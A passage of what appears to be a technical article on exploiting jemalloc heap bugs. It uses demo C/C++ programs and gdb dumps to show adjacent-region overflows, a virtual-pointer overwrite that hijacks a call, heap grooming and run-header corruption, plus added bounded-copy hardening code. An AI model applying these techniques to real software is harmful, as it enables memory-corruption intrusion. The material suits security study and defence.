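#define MASK_WORDS 8u     /* 253 bits need eight 32-bit words */

typedef struct {
    unsigned regs_minelm;            /* first mask word worth searching */
    unsigned nfree;                  /* free regions left in the run */
    uint32_t regs_mask[MASK_WORDS];  /* bit set == region is free */
} run_model_t;

void run_init(run_model_t *r)
{
    unsigned i;

    r->regs_minelm = 0;
    r->nfree = NREGS;
    for (i = 0; i < MASK_WORDS; i++)
        r->regs_mask[i] = 0xffffffffu;
    /* only 253 - 7 * 32 = 29 bits of the last word map to regions */
    r->regs_mask[MASK_WORDS - 1] = (1u << (NREGS % 32)) - 1;
}

/* MALLOC, small path: take the first set bit; returns the region's offset
 * from the start of the run, or -1 when the run is full. */
long run_alloc(run_model_t *r)
{
    unsigned i, bit;

    for (i = r->regs_minelm; i < MASK_WORDS; i++) {
        uint32_t mask = r->regs_mask[i];

        if (mask == 0)
            continue;
        for (bit = 0; !(mask & (1u << bit)); bit++)
            ;
        r->regs_mask[i] = mask & ~(1u << bit);  /* region now in use */
        r->regs_minelm = i;
        r->nfree--;
        return (long)(HDR_SIZE + (i * 32 + bit) * REG_SIZE);
    }
    return -1;
}

/* FREE, small path: offset -> region index -> set the bit again.
 * Returns 0 on success, -1 for an offset that is not a live region. */
int run_free(run_model_t *r, long off)
{
    unsigned long rel;
    unsigned idx, elm;
    uint32_t bit;

    if (off < (long)HDR_SIZE)
        return -1;
    rel = (unsigned long)off - HDR_SIZE;
    if (rel % REG_SIZE != 0 || rel / REG_SIZE >= NREGS)
        return -1;                  /* not a region boundary of this run */
    idx = (unsigned)(rel / REG_SIZE);
    elm = idx / 32;
    bit = 1u << (idx % 32);
    if (r->regs_mask[elm] & bit)
        return -1;                  /* bit already set: double free */
    r->regs_mask[elm] |= bit;
    r->nfree++;
    if (elm < r->regs_minelm)
        r->regs_minelm = elm;
    return 0;
}

int main(void)
{
    run_model_t r;
    long one, two, three;

    run_init(&r);
    one = run_alloc(&r);
    two = run_alloc(&r);
    three = run_alloc(&r);
    printf("offsets: 0x%lx 0x%lx 0x%lx\n", (unsigned long)one,
           (unsigned long)two, (unsigned long)three);
    printf("regs_mask[0]=0x%08x nfree=0x%x\n",
           (unsigned)r.regs_mask[0], r.nfree);
    run_free(&r, one);
    run_free(&r, two);
    run_free(&r, three);
    printf("regs_mask[0]=0x%08x nfree=0x%x\n",
           (unsigned)r.regs_mask[0], r.nfree);
    return 0;
}
```

The mask and nfree values the model reaches after three allocations and after
freeing them are the ones visible in the run dumps of section 3.1.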


--[ 3 - Exploitation tactics

In this section we analyze the exploitation tactics we have investigated
against jemalloc. Our goal is to provide to the interested hackers the
necessary knowledge and tools to develop exploits for jemalloc heap
corruption bugs.

We also try to approach jemalloc heap exploitation in an abstract way
initially, identifying 'exploitation primitives' and then continuing into
the specific required technical details. Chris Valasek and Ryan Smith have
explored the value of abstracting heap exploitation through primitives
[CVRS]. The main idea is that specific exploitation techniques eventually
become obsolete. Therefore it is important to approach exploitation
abstractly and identify primitives that can be applied to new targets. We
have used this approach before, comparing FreeBSD and Linux kernel heap
exploitation [HAPF, APHN]. Regarding jemalloc, we analyze adjacent data
corruption, heap manipulation and metadata corruption exploitation
primitives.


----[ 3.1 - Adjacent region corruption

The main idea behind adjacent heap item corruptions is that you exploit the
fact that the heap manager places user allocations next to each other
contiguously without other data in between. In jemalloc regions of the same
size class are placed on the same bin. In the case that they are also
placed on the same run of the bin then there are no inline metadata between
them. In 3.2 we will see how we can force this, but for now let's assume
that new allocations of the same size class are placed in the same run.

Therefore, we can place a victim object/structure of our choosing in the
same run and next to the vulnerable object/structure we plan to overflow.
The only requirement is that the victim and vulnerable objects need to be
of a size that puts them in the same size class and therefore possibly in
the same run (again, see the next subsection on how to control this). Since
there are no metadata between the two regions, we can overflow from the
vulnerable region to the victim region we have chosen. Usually the victim
region is something that can help us achieve arbitrary code execution, for
example function pointers.

In the following contrived example consider that 'three' is your chosen
victim object and that the vulnerable object is 'two' (full code in file
test-adjacent.c):


char *one, *two, *three;

printf("[*] before overflowing\n");

one = malloc(0x10);
memset(one, 0x41, 0x10);
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);

two = malloc(0x10);
memset(two, 0x42, 0x10);
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);

three = malloc(0x10);
memset(three, 0x43, 0x10);
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);

[3-1]

printf("[+] copying argv[1] to region two\n");
strcpy(two, argv[1]);

printf("[*] after overflowing\n");
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);

[3-2]

free(one);
free(two);
free(three);

printf("[*] after freeing all regions\n");
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);

[3-3]


The output (edited for readability):


$ ./test-adjacent `python -c 'print "X" * 30'`
[*] before overflowing
[+] region one:   0xb7003030: AAAAAAAAAAAAAAAA
[+] region two:   0xb7003040: BBBBBBBBBBBBBBBB
[+] region three: 0xb7003050: CCCCCCCCCCCCCCCC
[+] copying argv[1] to region two
[*] after overflowing
[+] region one:   0xb7003030: 
AAAAAAAAAAAAAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[+] region two:   0xb7003040: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[+] region three: 0xb7003050: XXXXXXXXXXXXXX
[*] after freeing all regions
[+] region one:   0xb7003030: 
AAAAAAAAAAAAAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[+] region two:   0xb7003040: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[+] region three: 0xb7003050: XXXXXXXXXXXXXX


Examining the above we can see that region 'one' is at 0xb7003030 and that
the following two allocations (regions 'two' and 'three') are in the same
run immediately after 'one' and all three next to each other without any
metadata in between them. After the overflow of 'two' with 30 'X's we can
see that region 'three' has been overwritten with 14 'X's (30 - 16 for the
size of region 'two').

In order to achieve a better understanding of the jemalloc memory layout
let's fire up gdb with three breakpoints at [3-1], [3-2] and [3-3].

At breakpoint [3-1]:


Breakpoint 1, 0x080486a9 in main ()
gdb $ print arenas[0].bins[2].runcur
$1 = (arena_run_t *) 0xb7003000


At 0xb7003000 is the current run of the bin bins[2] that manages the size
class 16 in the standalone jemalloc flavor that we have linked against.
Let's take a look at the run's contents:


gdb $ x/40x 0xb7003000
0xb7003000: 0xb78007ec  0x00000003  0x000000fa  0xfffffff8
0xb7003010: 0xffffffff  0xffffffff  0xffffffff  0xffffffff
0xb7003020: 0xffffffff  0xffffffff  0x1fffffff  0x000000ff
0xb7003030: 0x41414141  0x41414141  0x41414141  0x41414141
0xb7003040: 0x42424242  0x42424242  0x42424242  0x42424242
0xb7003050: 0x43434343  0x43434343  0x43434343  0x43434343
0xb7003060: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7003070: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7003080: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7003090: 0x00000000  0x00000000  0x00000000  0x00000000


After some initial metadata (the run's header which we will see in more
detail at 3.3.1) we have region 'one' at 0xb7003030 followed by regions
'two' and 'three', all of size 16 bytes. Again we can see that there are no
metadata between the regions. Continuing to breakpoint [3-2] and examining
again the contents of the run:


Breakpoint 2, 0x08048724 in main ()
gdb $ x/40x 0xb7003000
0xb7003000: 0xb78007ec  0x00000003  0x000000fa  0xfffffff8
0xb7003010: 0xffffffff  0xffffffff  0xffffffff  0xffffffff
0xb7003020: 0xffffffff  0xffffffff  0x1fffffff  0x000000ff
0xb7003030: 0x41414141  0x41414141  0x41414141  0x41414141
0xb7003040: 0x58585858  0x58585858  0x58585858  0x58585858
0xb7003050: 0x58585858  0x58585858  0x58585858  0x43005858
0xb7003060: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7003070: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7003080: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7003090: 0x00000000  0x00000000  0x00000000  0x00000000


We can see that our 30 'X's (0x58) have overwritten the complete 16 bytes
of region 'two' at 0xb7003040 and continued for 15 bytes (14 plus a NULL
from strcpy(3)) in region 'three' at 0xb7003050. From this memory dump it
should be clear why the printf(3) call of region 'one' after the overflow
continues to print all 46 bytes (16 from region 'one' plus 30 from the
overflow) up to the NULL placed by the strcpy(3) call. As it has been
demonstrated by Peter Vreugdenhil in the context of Internet Explorer heap
overflows [PV10], this can lead to information leaks from the region that
is adjacent to the region with the string whose terminating NULL has been
overwritten. You just need to read back the string and you will get all
data up to the first encountered NULL.

At breakpoint [3-3] after the deallocation of all three regions:


Breakpoint 3, 0x080487ab in main ()
gdb $ x/40x 0xb7003000
0xb7003000: 0xb78007ec  0x00000003  0x000000fd  0xffffffff
0xb7003010: 0xffffffff  0xffffffff  0xffffffff  0xffffffff
0xb7003020: 0xffffffff  0xffffffff  0x1fffffff  0x000000ff
0xb7003030: 0x41414141  0x41414141  0x41414141  0x41414141
0xb7003040: 0x58585858  0x58585858  0x58585858  0x58585858
0xb7003050: 0x58585858  0x58585858  0x58585858  0x43005858
0xb7003060: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7003070: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7003080: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7003090: 0x00000000  0x00000000  0x00000000  0x00000000


We can see that jemalloc does not clear the freed regions. This behavior of
leaving stale data in regions that have been freed and can be allocated
again can lead to easier exploitation of use-after-free bugs (see next
section).
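
The overflow shown above and a bounded replacement for the strcpy(3) call,
as an added example (not the article's test-adjacent.c). The three 16-byte
regions are modeled inside one constructed array so that the unchecked copy
stays well-defined; fake_run_t and all function names are hypothetical.

```c
/* Added model of test-adjacent's three regions; not the article's code. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define REG_SIZE 16   /* size class used by test-adjacent */
#define NREGS    3    /* 'one', 'two', 'three' */

/* Constructed stand-in for part of a run: regions back to back with no
 * metadata in between, followed by zeroed slack as in the page's dump. */
typedef struct {
    char mem[REG_SIZE * NREGS + REG_SIZE];
} fake_run_t;

char *region(fake_run_t *r, int i)
{
    return r->mem + (size_t)i * REG_SIZE;
}

/* Same fill pattern as the article: 16 bytes each, no terminator. */
void fake_run_fill(fake_run_t *r)
{
    memset(r->mem, 0, sizeof(r->mem));
    memset(region(r, 0), 'A', REG_SIZE);
    memset(region(r, 1), 'B', REG_SIZE);
    memset(region(r, 2), 'C', REG_SIZE);
}

/* What strcpy(two, argv[1]) does: copies strlen(src) + 1 bytes and never
 * looks at the region size.  The guard only keeps this model inside its own
 * backing array; it is not a region-size check. */
int copy_unchecked(fake_run_t *r, int i, const char *src)
{
    size_t n = strlen(src) + 1;
    size_t room = sizeof(r->mem) - (size_t)i * REG_SIZE;

    if (n > room)
        return -1;
    memcpy(region(r, i), src, n);
    return 0;
}

/* Hardened form: the string and its terminator must fit in the region. */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);

    if (n >= dst_size)
        return -1;          /* refuse instead of spilling into a neighbour */
    memcpy(dst, src, n + 1);
    return 0;
}

/* Length to print for a region that may lack a terminator: stops at the
 * region boundary, unlike printf("%s") on the raw pointer. */
size_t region_strlen(const char *reg, size_t reg_size)
{
    const char *nul = memchr(reg, '\0', reg_size);

    return nul ? (size_t)(nul - reg) : reg_size;
}

int main(void)
{
    fake_run_t r;
    char input[31];

    memset(input, 'X', 30);     /* constructed input: 30 'X's as on the page */
    input[30] = '\0';

    fake_run_fill(&r);
    copy_unchecked(&r, 1, input);
    printf("unchecked: one reads as %lu bytes, three = \"%s\"\n",
           (unsigned long)strlen(region(&r, 0)), region(&r, 2));

    fake_run_fill(&r);
    if (copy_checked(region(&r, 1), REG_SIZE, input) != 0)
        printf("checked:   30-byte input rejected, three = \"%.*s\"\n",
               (int)region_strlen(region(&r, 2), REG_SIZE), region(&r, 2));
    return 0;
}
```

With the length check in place the neighbouring region keeps its contents, and
printing through region_strlen() never reads past a region whose terminator is
missing.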

To explore the adjacent region corruption primitive further in the context
of jemalloc, we will now look at C++ and virtual function pointers (VPTRs).
We will only focus on jemalloc-related details; for more general
information the interested reader should see rix's Phrack paper (the
principles of which are still applicable) [VPTR]. We begin with a C++
example that is based on rix's bo2.cpp (file vuln-vptr.cpp in the code
archive):


class base
{
    private:

        char buf[32];

    public:

        void
        copy(const char *str)
        {
            strcpy(buf, str);
        }
        
        virtual void
        print(void)
        {
            printf("buf: 0x%08x: %s\n", buf, buf);
        }
};

class derived_a : public base
{
    public:

        void
        print(void)
        {
            printf("[+] derived_a: ");
            base::print();
        }
};

class derived_b : public base
{
    public:

        void
        print(void)
        {
            printf("[+] derived_b: ");
            base::print();
        }
};

int
main(int argc, char *argv[])
{
    base *obj_a;
    base *obj_b;

    obj_a = new derived_a;
    obj_b = new derived_b;

    printf("[+] obj_a:\t0x%x\n", (unsigned int)obj_a);
    printf("[+] obj_b:\t0x%x\n", (unsigned int)obj_b);

    if(argc == 3)
    {
        printf("[+] overflowing from obj_a into obj_b\n");
        obj_a->copy(argv[1]);

        obj_b->copy(argv[2]);

        obj_a->print();
        obj_b->print();

        return 0;
    }


We have a base class with a virtual function, 'print(void)', and two
derived classes that override this virtual function. Then in main, we use
'new' to create two new objects, one from each of the derived classes.
Subsequently we overflow the 'buf' buffer of 'obj_a' with 'argv[1]'.

Let's explore with gdb:


$ gdb vuln-vptr
...
gdb $ r `python -c 'print "A" * 48'` `python -c 'print "B" * 10'`
...
0x804862f <main(int, char**)+15>:    movl   $0x24,(%esp)
0x8048636 <main(int, char**)+22>:    call   0x80485fc <_Znwj@plt>
0x804863b <main(int, char**)+27>:    movl   $0x80489e0,(%eax)
gdb $ print $eax
$13 = 0xb7c01040


At 0x8048636 we can see the first 'new' call which takes as a parameter the
size of the object to create, that is 0x24 or 36 bytes. C++ will of course
use jemalloc to allocate the required amount of memory for this new object.
After the call instruction, EAX has the address of the allocated region
(0xb7c01040) and at 0x804863b the value 0x80489e0 is moved there. This is
the VPTR that points to 'print(void)' of 'obj_a':


gdb $ x/x *0x080489e0
0x80487d0 <derived_a::print()>: 0xc71cec83


Now it must be clear why even though the declared buffer is 32 bytes long,
there are 36 bytes allocated for the object. Exactly the same as above
happens with the second 'new' call, but this time the VPTR points to
'obj_b' (which is at 0xb7c01070):


0x8048643 <main(int, char**)+35>:    movl   $0x24,(%esp)
0x804864a <main(int, char**)+42>:    call   0x80485fc <_Znwj@plt>
0x804864f <main(int, char**)+47>:    movl   $0x80489f0,(%eax)
gdb $ x/x *0x080489f0
0x8048800 <derived_b::print()>: 0xc71cec83
gdb $ print $eax
$14 = 0xb7c01070


At this point, let's explore jemalloc's internals:


gdb $ print arenas[0].bins[5].runcur
$8 = (arena_run_t *) 0xb7c01000
gdb $ print arenas[0].bins[5].reg_size
$9 = 0x30
gdb $ print arenas[0].bins[4].reg_size
$10 = 0x20
gdb $ x/40x 0xb7c01000
0xb7c01000: 0xb7fd315c  0x00000000  0x00000052  0xfffffffc
0xb7c01010: 0xffffffff  0x000fffff  0x00000000  0x00000000
0xb7c01020: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7c01030: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7c01040: 0x080489e0  0x00000000  0x00000000  0x00000000
0xb7c01050: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7c01060: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7c01070: 0x080489f0  0x00000000  0x00000000  0x00000000
0xb7c01080: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7c01090: 0x00000000  0x00000000  0x00000000  0x00000000


Our run is at 0xb7c01000 and the bin is bin[5] which handles regions of
size 0x30 (48 in decimal). Since our objects are of size 36 bytes they
don't fit in the previous bin, i.e. bin[4], of size 0x20 (32). We can see
'obj_a' at 0xb7c01040 with its VPTR (0x080489e0) and 'obj_b' at 0xb7c01070
with its own VPTR (0x080489f0).

Our next breakpoint is after the overflow of 'obj_a' into 'obj_b' and just
before the first call of 'print()'. Our run now looks like the following:


gdb $ x/40x 0xb7c01000
0xb7c01000: 0xb7fd315c  0x00000000  0x00000052  0xfffffffc
0xb7c01010: 0xffffffff  0x000fffff  0x00000000  0x00000000
0xb7c01020: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7c01030: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7c01040: 0x080489e0  0x41414141  0x41414141  0x41414141
0xb7c01050: 0x41414141  0x41414141  0x41414141  0x41414141
0xb7c01060: 0x41414141  0x41414141  0x41414141  0x41414141
0xb7c01070: 0x41414141  0x42424242  0x42424242  0x00004242
0xb7c01080: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7c01090: 0x00000000  0x00000000  0x00000000  0x00000000
gdb $ x/i $eip
0x80486d1 <main(int, char**)+177>:   call   *(%eax)
gdb $ print $eax
$15 = 0x80489e0


At 0x080486d1 is the call of 'print()' of 'obj_a'. At 0xb7c01070 we can see
that we have overwritten the VPTR of 'obj_b' that was in an adjacent region
to 'obj_a'. Finally, at the call of 'print()' by 'obj_b':


gdb $ x/i $eip
=> 0x80486d8 <main(int, char**)+184>:   call   *(%eax)
gdb $ print $eax
$16 = 0x41414141


----[ 3.2 - Heap manipulation

In order to be able to arrange the jemalloc heap in a predictable state we
need to understand the allocator's behavior and use heap manipulation
tactics to influence it to our advantage. In the context of browsers, heap
manipulation tactics are usually referred to as 'Heap Feng Shui' after
Alexander Sotirov's work [FENG].

By 'predictable state' we mean that the heap must be arranged as reliably
as possible in a way that we can position data where we want. This enables
us to use the tactic of corrupting adjacent regions of the previous
paragraph, but also to exploit use-after-free bugs. In use-after-free
bugs a memory region is allocated, used, freed and then used again due
to a bug. In such a case if we know the region's size we can manipulate
the heap to place data of our own choosing in the freed region's memory
slot on its run before it is used again. Upon its subsequent incorrect use
the region now has our data that can help us hijack the flow of execution.

To explore jemalloc's behavior and manipulate it into a predictable
state we use an algorithm similar to the one presented in [HOEJ]. Since
in the general case we cannot know beforehand the state of the runs of
the size class we are interested in, we perform many allocations of this
size hoping to cover the holes (i.e. free regions) in the existing runs
and get a fresh run. Hopefully the next series of allocations we will
perform will be on this fresh run and therefore will be sequential. As
we have seen, sequential allocations on a largely empty run are also
contiguous. Next, we perform such a series of allocations controlled by
us. In the case we are trying to use the adjacent regions corruption
tactic, these allocations are of the victim object/structure we have
chosen to help us gain code execution when corrupted.

The following step is to deallocate every second region in this last series
of controlled victim allocations. This will create holes in between the
victim objects/structures on the run of the size class we are trying to
manipulate. Finally, we trigger the heap overflow bug; due to the state we
have arranged, jemalloc is forced to place the vulnerable objects in holes
on the target run, overflowing into the victim objects.

Let's demonstrate the above discussion with an example (file test-holes.c
in the code archive):


#define TSIZE   0x10            /* target size class */
#define NALLOC  500             /* number of allocations */
#define NFREE   (NALLOC / 10)   /* number of deallocations */

char *foo[NALLOC];
char *bar[NALLOC];

printf("step 1: controlled allocations of victim objects\n");

for(i = 0; i < NALLOC; i++)
{
    foo[i] = malloc(TSIZE);
    printf("foo[%d]:\t\t0x%x\n", i, (unsigned int)foo[i]);
}

printf("step 2: creating holes in between the victim objects\n");

for(i = (NALLOC - NFREE); i < NALLOC; i += 2)
{
    printf("freeing foo[%d]:\t0x%x\n", i, (unsigned int)foo[i]);
    free(foo[i]);
}

printf("step 3: fill holes with vulnerable objects\n");

for(i = (NALLOC - NFREE + 1); i < NALLOC; i += 2)
{
    bar[i] = malloc(TSIZE);
    printf("bar[%d]:\t0x%x\n", i, (unsigned int)bar[i]);
}


jemalloc's behavior can be observed in the output; remember that our target
size class is 16 bytes:


$ ./test-holes
step 1: controlled allocations of victim objects
foo[0]:             0x40201030
foo[1]:             0x40201040
foo[2]:             0x40201050
foo[3]:             0x40201060
foo[4]:             0x40201070
foo[5]:             0x40201080
foo[6]:             0x40201090
foo[7]:             0x402010a0

...

foo[447]:           0x40202c50
foo[448]:           0x40202c60
foo[449]:           0x40202c70
foo[450]:           0x40202c80
foo[451]:           0x40202c90
foo[452]:           0x40202ca0
foo[453]:           0x40202cb0
foo[454]:           0x40202cc0
foo[455]:           0x40202cd0
foo[456]:           0x40202ce0
foo[457]:           0x40202cf0
foo[458]:           0x40202d00
foo[459]:           0x40202d10
foo[460]:           0x40202d20

...

step 2: creating holes in between the victim objects
freeing foo[450]:   0x40202c80
freeing foo[452]:   0x40202ca0
freeing foo[454]:   0x40202cc0
freeing foo[456]:   0x40202ce0
freeing foo[458]:   0x40202d00
freeing foo[460]:   0x40202d20
freeing foo[462]:   0x40202d40
freeing foo[464]:   0x40202d60
freeing foo[466]:   0x40202d80
freeing foo[468]:   0x40202da0
freeing foo[470]:   0x40202dc0
freeing foo[472]:   0x40202de0
freeing foo[474]:   0x40202e00
freeing foo[476]:   0x40202e20
freeing foo[478]:   0x40202e40
freeing foo[480]:   0x40202e60
freeing foo[482]:   0x40202e80
freeing foo[484]:   0x40202ea0
freeing foo[486]:   0x40202ec0
freeing foo[488]:   0x40202ee0
freeing foo[490]:   0x40202f00
freeing foo[492]:   0x40202f20
freeing foo[494]:   0x40202f40
freeing foo[496]:   0x40202f60
freeing foo[498]:   0x40202f80

step 3: fill holes with vulnerable objects
bar[451]:           0x40202c80
bar[453]:           0x40202ca0
bar[455]:           0x40202cc0
bar[457]:           0x40202ce0
bar[459]:           0x40202d00
bar[461]:           0x40202d20
bar[463]:           0x40202d40
bar[465]:           0x40202d60
bar[467]:           0x40202d80
bar[469]:           0x40202da0
bar[471]:           0x40202dc0
bar[473]:           0x40202de0
bar[475]:           0x40202e00
bar[477]:           0x40202e20
bar[479]:           0x40202e40
bar[481]:           0x40202e60
bar[483]:           0x40202e80
bar[485]:           0x40202ea0
bar[487]:           0x40202ec0
bar[489]:           0x40202ee0
bar[491]:           0x40202f00
bar[493]:           0x40202f20
bar[495]:           0x40202f40
bar[497]:           0x40202f60
bar[499]:           0x40202f80


We can see that jemalloc works in a FIFO way; the first region freed is the
first returned for a subsequent allocation request. Although our example
mainly demonstrates how to manipulate the jemalloc heap to exploit adjacent
region corruptions, our observations can also help us to exploit
use-after-free vulnerabilities. When our goal is to get data of our own
choosing in the same region as a freed region about to be used, jemalloc's
FIFO behavior can help us place our data in a predictable way.

In the above discussion we have implicitly assumed that we can make
arbitrary allocations and deallocations; i.e. that we have available in
our exploitation tool belt allocation and deallocation primitives for
our target size. Depending on the vulnerable application (that relies
on jemalloc) this may or may not be straightforward. For example, if
our target is a media player we may be able to control allocations by
introducing an arbitrary number of metadata tags in the input file. In
the case of Firefox we can of course use JavaScript to implement our
heap primitives.  But that's the topic of another paper.


----[ 3.3 - Metadata corruption

The final heap corruption primitive we will focus on is the corruption of
metadata. We will once again remind you that since jemalloc is not based
on freelists (it uses macro-based red black trees instead), unlink and
frontlink exploitation techniques are not usable. We will instead pay
attention to how we can force 'malloc()' to return a pointer that points
to already initialized heap regions.


------[ 3.3.1 - Run (arena_run_t)

We have already defined what a 'run' is in section 2.1.3. We will briefly
remind the reader that a 'run' is just a collection of memory regions of
equal size that starts with some metadata describing it. Recall that runs
are always aligned to a multiple of the page size (0x1000 in most real
life applications). The run metadata obey the layout shown in [2-3].

For release builds the 'magic' field will not be present (that is,
MALLOC_DEBUG is off by default). As we have already mentioned, each
run contains a pointer to the bin whose regions it contains. The 'bin'
pointer is read and dereferenced from 'arena_run_t' (see [2-3]) only
during deallocation. On deallocation the region size is unknown, thus the
bin index cannot be computed directly. Instead, jemalloc will first find
the run in which the memory to be freed is located and will then
dereference the bin pointer stored in the run's header. From function
'arena_dalloc_small':


arena_dalloc_small(arena_t *arena, arena_chunk_t *chunk, void *ptr,
        arena_chunk_map_t *mapelm)
{
    arena_run_t *run;
    arena_bin_t *bin;
    size_t size;

    run = (arena_run_t *)(mapelm->bits & ~pagesize_mask);
    bin = run->bin;
    size = bin->reg_size;


On the other hand, during the allocation process, once the appropriate run
is located, its 'regs_mask[]' bit vector is examined in search of a free
region. Note that the search for a free region starts at
'regs_mask[regs_minelm]' ('regs_minelm' holds the index of the first
'regs_mask[]' element that has nonzero bits). We will exploit this fact to
force 'malloc()' to return an already allocated region.

In a heap overflow situation it is pretty common for the attacker to be
able to overflow a memory region which is not followed by other regions
(like the wilderness chunk in dlmalloc, but in jemalloc such regions are
not that special). In such a situation, the attacker will most likely be
able to overwrite the run header of the next run. Since runs hold memory
regions of equal size, the next page aligned address will either be a
normal page of the current run, or will contain the metadata (header) of
the next run which will hold regions of different size (larger or smaller,
it doesn't really matter). In the first case, overwriting adjacent regions
of the same run is possible and thus an attacker can use the techniques
that were previously discussed in 3.1. The latter case is the subject of
the following paragraphs.

People already familiar with heap exploitation may recall that it is
pretty common for an attacker to control the last heap item (region in our
case) allocated, that is, the most recently allocated region is the one
being overflown. Because of the importance of this situation, we believe
it is essential to have a look at how we can leverage it to gain control
of the target process.

Let's first have a look at what the in-memory model of a run looks like
(file test-run.c):


char *first;

first = (char *)malloc(16);
printf("first = %p\n", first);
memset(first, 'A', 16);

breakpoint();

free(first);


The test program is compiled and a debugging build of jemalloc is loaded
to be used with gdb.


~$ gcc -g -Wall test-run.c -o test-run
~$ export LD_PRELOAD=/usr/src/lib/libc/libc.so.7
~$ gdb test-run
GNU gdb 6.1.1 [FreeBSD]
...
(gdb) run
...
first = 0x28201030

Program received signal SIGTRAP, Trace/breakpoint trap.
main () at simple.c:14
14        free(first);


The call to malloc() returns the address 0x28201030 which belongs to the
run at 0x28201000.


(gdb) print *(arena_run_t *)0x28201000
$1 = {bin = 0x8049838, regs_minelm = 0, nfree = 252,
  regs_mask = {4294967294}}
(gdb) print *(arena_bin_t *)0x8049838
$2 = {runcur = 0x28201000, runs = {...}, reg_size = 16, run_size = 4096,
  nregs = 253, regs_mask_nelms = 8, reg0_offset = 48}


Oki doki, run 0x28201000 services the requests for memory regions of size
16 as indicated by the 'reg_size' value of the bin pointer stored in the
run header (notice that run->bin->runcur == run).

Now let's proceed with studying a scenario that can lead to 'malloc()'
exploitation. For our example let's assume that the attacker controls
a memory region 'A' which is the last in its run.


[run #1 header][RR...RA][run #2 header][RR...]


In the simple diagram shown above, 'R' stands for a normal region which may
or may not be allocated while 'A' corresponds to the region that belongs to
the attacker, i.e. it is the one that will be overflown. 'A' does not
strictly need to be the last region of run #1. It can also be any region of
the run. Let's explore how from a region on run #1 we can reach the
metadata of run #2 (file test-runhdr.c, also see [2-6]):


unsigned char code[] = "\x61\x62\x63\x64";

one = malloc(0x10);
memset(one, 0x41, 0x10);
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);

two = malloc(0x10);
memset(two, 0x42, 0x10);
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);

three = malloc(0x20);
memset(three, 0x43, 0x20);
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);

__asm__("int3");

printf("[+] corrupting the metadata of region three's run\n");
memcpy(two + 4032, code, 4);

__asm__("int3");


At the first breakpoint we can see that for size 16 the run is at
0xb7d01000 and for size 32 the run is at 0xb7d02000:


gdb $ r
[Thread debugging using libthread_db enabled]
[+] region one:     0xb7d01030: AAAAAAAAAAAAAAAA
[+] region two:     0xb7d01040: BBBBBBBBBBBBBBBB
[+] region three:   0xb7d02020: CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

Program received signal SIGTRAP, Trace/breakpoint trap.

gdb $ print arenas[0].bins[3].runcur
$5 = (arena_run_t *) 0xb7d01000
gdb $ print arenas[0].bins[4].runcur
$6 = (arena_run_t *) 0xb7d02000


The metadata of run 0xb7d02000 are:


gdb $ x/30x 0xb7d02000
0xb7d02000: 0xb7fd3134  0x00000000  0x0000007e  0xfffffffe
0xb7d02010: 0xffffffff  0xffffffff  0x7fffffff  0x00000000
0xb7d02020: 0x43434343  0x43434343  0x43434343  0x43434343
0xb7d02030: 0x43434343  0x43434343  0x43434343  0x43434343
0xb7d02040: 0x00000000  0x00000000  0x00000000  0x00000000


After the memcpy() and at the second breakpoint:


gdb $ x/30x 0xb7d02000
0xb7d02000: 0x64636261  0x00000000  0x0000007e  0xfffffffe
0xb7d02010: 0xffffffff  0xffffffff  0x7fffffff  0x00000000
0xb7d02020: 0x43434343  0x43434343  0x43434343  0x43434343
0xb7d02030: 0x43434343  0x43434343  0x43434343  0x43434343
0xb7d02040: 0x00000000  0x00000000  0x00000000  0x00000000


We can see that the run's metadata and specifically the address of the
'bin' element (see [2-3]) has been overwritten. One way or the other, the
attacker will be able to alter the contents of run #2's header, but once
this has happened, what's the potential of achieving code execution?

A careful reader would have already thought of the obvious: one can
overwrite the 'bin' pointer to make it point to a fake bin structure of his
own. Well, this is not a good idea for two reasons. First, the attacker
needs further control of the target process in order to successfully
construct a fake bin header somewhere in memory. Secondly, and most
importantly, as it has already been discussed, the 'bin' pointer of a
region's run header is dereferenced only during deallocation. A careful
study of the jemalloc source code reveals that only 'run->bin->reg0_offset'
is actually used (somewhere in 'arena_run_reg_dalloc()'), thus, from an
attacker's point of view, the bin pointer is not that interesting
('reg0_offset' overwrite may cause further problems as well leading to
crashes and a forced interrupt of our exploit).

Our attack consists of the following steps. The attacker overflows
'A' and overwrites run #2's header. Then, upon the next malloc() of
a size equal to the size serviced by run #2, the user will get as a
result a pointer to a memory region of the previous run (run #1 in our
example). It is important to understand that in order for the attack to
work, the overflown run should serve regions that belong to any of the
available bins. Let's further examine our case (file vuln-run.c):


char *one, *two, *three, *four, *temp;
char offset[sizeof(size_t)];
int i;

if(argc < 2)
{
    printf("%s <offset>\n", argv[0]);
    return 0;
}

